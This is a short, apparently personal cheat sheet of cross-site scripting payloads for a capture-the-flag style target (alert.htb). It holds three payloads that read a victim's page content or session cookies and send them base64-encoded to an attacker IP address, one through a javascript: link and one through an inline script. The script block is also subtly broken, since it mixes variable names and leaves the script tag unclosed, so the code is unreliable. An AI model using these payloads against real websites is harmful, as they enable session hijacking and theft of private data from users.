Perform GET/POST request on victim session
<a href='javascript: fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php") .then(response => response.text()) .then(data => fetch("http://10.10.14.16/", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "d=" + encodeURIComponent(btoa(unescape(encodeURIComponent(data)))) }));'>XSS test</a>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","https://alert.htb/index.php?page=messages",true);
var attacker = "http://10.10.14.16/cookie="
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
req.send();
<script>
<a href="javascript:fetch('http://10.10.14.16/?d='+encodeURIComponent(btoa(document.cookie)));">XSS test </a>